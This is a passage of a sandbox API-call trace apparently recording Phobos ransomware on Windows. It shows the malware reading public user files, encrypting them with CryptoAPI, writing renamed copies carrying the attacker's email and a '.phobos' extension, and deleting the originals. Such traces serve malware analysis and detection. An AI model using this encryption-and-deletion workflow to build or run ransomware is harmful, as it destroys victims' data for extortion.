returned 1 [0205.455] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0205.455] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0205.455] CryptDestroyKey (hKey=0xa32868) returned 1 [0205.455] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0205.456] CryptDestroyKey (hKey=0xa328e8) returned 1 [0205.456] CloseHandle (hObject=0x178) returned 1 [0205.456] CloseHandle (hObject=0xfc) returned 1 [0205.456] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg")) returned 1 [0205.467] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0205.467] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0205.539] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=561276) returned 1 [0205.539] CloseHandle (hObject=0x160) returned 1 [0205.539] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg")) returned 0x20 [0205.539] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.540] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0205.540] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0205.540] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0205.540] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.548] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0205.549] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0205.549] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x8907c, lpOverlapped=0x0) returned 1 [0205.640] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x89080, dwBufLen=0x89080 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x89080) returned 1 [0205.644] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x89080, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x89080, lpOverlapped=0x0) returned 1 [0205.657] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0205.657] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0205.657] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0205.657] CryptDestroyKey (hKey=0xa32868) returned 1 [0205.657] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0205.657] CryptDestroyKey (hKey=0xa32a28) returned 1 [0205.657] CloseHandle (hObject=0x160) returned 1 [0205.657] CloseHandle (hObject=0xfc) returned 1 [0205.657] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg")) returned 1 [0205.662] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0205.662] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0205.666] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=80) returned 1 [0205.666] CloseHandle (hObject=0x124) returned 1 [0205.667] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini")) returned 0x26 [0205.667] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.667] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0205.667] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0205.667] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0205.667] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0205.939] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32928) returned 1 [0205.939] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0205.939] ReadFile (in: hFile=0x124, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x50, lpOverlapped=0x0) returned 1 [0205.940] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60, dwBufLen=0x60 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60) returned 1 [0205.940] WriteFile (in: hFile=0x13c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x60, lpOverlapped=0x0) returned 1 [0205.941] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a28) returned 1 [0205.941] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0205.941] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0205.941] CryptDestroyKey (hKey=0xa32a28) returned 1 [0205.941] WriteFile (in: hFile=0x13c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0205.941] CryptDestroyKey (hKey=0xa32928) returned 1 [0205.941] CloseHandle (hObject=0x124) returned 1 [0205.941] CloseHandle (hObject=0x13c) returned 1 [0205.941] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini")) returned 1 [0205.942] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0205.942] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0205.943] GetFileSizeEx (in: hFile=0x13c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=380) returned 1 [0205.943] CloseHandle (hObject=0x13c) returned 1 [0205.943] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini")) returned 0x26 [0205.943] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\videos\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.943] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0205.943] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0205.943] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0205.943] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\videos\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0205.944] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32928) returned 1 [0205.944] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0205.944] ReadFile (in: hFile=0x13c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x17c, lpOverlapped=0x0) returned 1 [0205.945] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x180, dwBufLen=0x180 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x180) returned 1 [0205.945] WriteFile (in: hFile=0x124, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x180, lpOverlapped=0x0) returned 1 [0205.946] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a28) returned 1 [0205.946] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0205.946] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0205.946] CryptDestroyKey (hKey=0xa32a28) returned 1 [0205.946] WriteFile (in: hFile=0x124, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0205.946] CryptDestroyKey (hKey=0xa32928) returned 1 [0205.946] CloseHandle (hObject=0x13c) returned 1 [0205.946] CloseHandle (hObject=0x124) returned 1 [0205.947] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini")) returned 1 [0205.948] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0205.948] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0205.948] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=326) returned 1 [0205.948] CloseHandle (hObject=0x124) returned 1 [0205.948] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini")) returned 0x26 [0205.948] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.948] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0205.948] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0205.949] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0205.949] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0205.949] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32928) returned 1 [0205.949] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0205.949] ReadFile (in: hFile=0x124, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x146, lpOverlapped=0x0) returned 1 [0205.950] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x150, dwBufLen=0x150 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x150) returned 1 [0205.950] WriteFile (in: hFile=0x13c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x150, lpOverlapped=0x0) returned 1 [0205.951] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a28) returned 1 [0205.951] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0205.951] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0205.951] CryptDestroyKey (hKey=0xa32a28) returned 1 [0205.951] WriteFile (in: hFile=0x13c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0205.951] CryptDestroyKey (hKey=0xa32928) returned 1 [0205.951] CloseHandle (hObject=0x124) returned 1 [0205.951] CloseHandle (hObject=0x13c) returned 1 [0205.951] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini")) returned 1 [0205.952] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0205.952] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0205.953] GetFileSizeEx (in: hFile=0x13c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=26246026) returned 1 [0205.953] CloseHandle (hObject=0x13c) returned 1 [0205.953] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv")) returned 0x20 [0205.953] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0205.954] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0205.954] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0205.954] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0205.954] ReadFile (in: hFile=0x13c, lpBuffer=0x3190058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a0fa84, lpOverlapped=0x0 | out: lpBuffer=0x3190058*, lpNumberOfBytesRead=0x2a0fa84*=0x40000, lpOverlapped=0x0) returned 1 [0206.185] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x857e83, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0206.185] ReadFile (in: hFile=0x13c, lpBuffer=0x31d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a0fa84, lpOverlapped=0x0 | out: lpBuffer=0x31d0058*, lpNumberOfBytesRead=0x2a0fa84*=0x40000, lpOverlapped=0x0) returned 1 [0206.261] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x18c7b8a, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0206.261] ReadFile (in: hFile=0x13c, lpBuffer=0x3210058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a0fa84, lpOverlapped=0x0 | out: lpBuffer=0x3210058*, lpNumberOfBytesRead=0x2a0fa84*=0x40000, lpOverlapped=0x0) returned 1 [0206.448] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa68, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fad4 | out: phKey=0x2a0fad4*=0xa32928) returned 1 [0206.448] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0206.448] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa88*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa88*=0xc0060) returned 1 [0206.453] CryptDestroyKey (hKey=0xa32928) returned 1 [0206.453] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fab0 | out: lpNewFilePointer=0x0) returned 1 [0206.453] WriteFile (in: hFile=0x13c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2a0fac0, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac0*=0xc0112, lpOverlapped=0x0) returned 1 [0206.464] SetEndOfFile (hFile=0x13c) returned 1 [0206.465] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x18c7b8a, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa80 | out: lpNewFilePointer=0x0) returned 1 [0206.465] WriteFile (in: hFile=0x13c, lpBuffer=0x325014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a0fa8c, lpOverlapped=0x0 | out: lpBuffer=0x325014a*, lpNumberOfBytesWritten=0x2a0fa8c*=0x40000, lpOverlapped=0x0) returned 1 [0206.466] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x857e83, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa80 | out: lpNewFilePointer=0x0) returned 1 [0206.466] WriteFile (in: hFile=0x13c, lpBuffer=0x325014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a0fa8c, lpOverlapped=0x0 | out: lpBuffer=0x325014a*, lpNumberOfBytesWritten=0x2a0fa8c*=0x40000, lpOverlapped=0x0) returned 1 [0206.466] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa80 | out: lpNewFilePointer=0x0) returned 1 [0206.466] WriteFile (in: hFile=0x13c, lpBuffer=0x325014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a0fa8c, lpOverlapped=0x0 | out: lpBuffer=0x325014a*, lpNumberOfBytesWritten=0x2a0fa8c*=0x40000, lpOverlapped=0x0) returned 1 [0206.467] CloseHandle (hObject=0x13c) returned 1 [0206.467] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fb18 | out: phKey=0x2a0fb18*=0xa32928) returned 1 [0206.467] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2a0fb00, dwFlags=0x0) returned 1 [0206.467] CryptDecrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x2a0facc | out: pbData=0x20f16c0, pdwDataLen=0x2a0facc) returned 1 [0206.467] CryptDestroyKey (hKey=0xa32928) returned 1 [0206.467] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76180000 [0206.468] GetProcAddress (hModule=0x76180000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x761ad668 [0206.468] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0206.468] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 Thread: id = 141 os_tid = 0x7ac [0132.736] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10000) returned 0x22f7ab0 [0132.736] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10000) returned 0x32b0048 [0132.737] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x28) returned 0x22277f0 [0132.737] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x110102) returned 0x34b0020 [0132.737] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x50) returned 0x2227820 [0132.737] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc78, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fce0 | out: phKey=0x2f4fce0*=0xa28e48) returned 1 [0132.737] CryptSetKeyParam (hKey=0xa28e48, dwParam=0x1, pbData=0x2f4fcc8, dwFlags=0x0) returned 1 [0132.737] CryptDecrypt (in: hKey=0xa28e48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x2f4fc94 | out: pbData=0x2227820, pdwDataLen=0x2f4fc94) returned 1 [0132.737] CryptDestroyKey 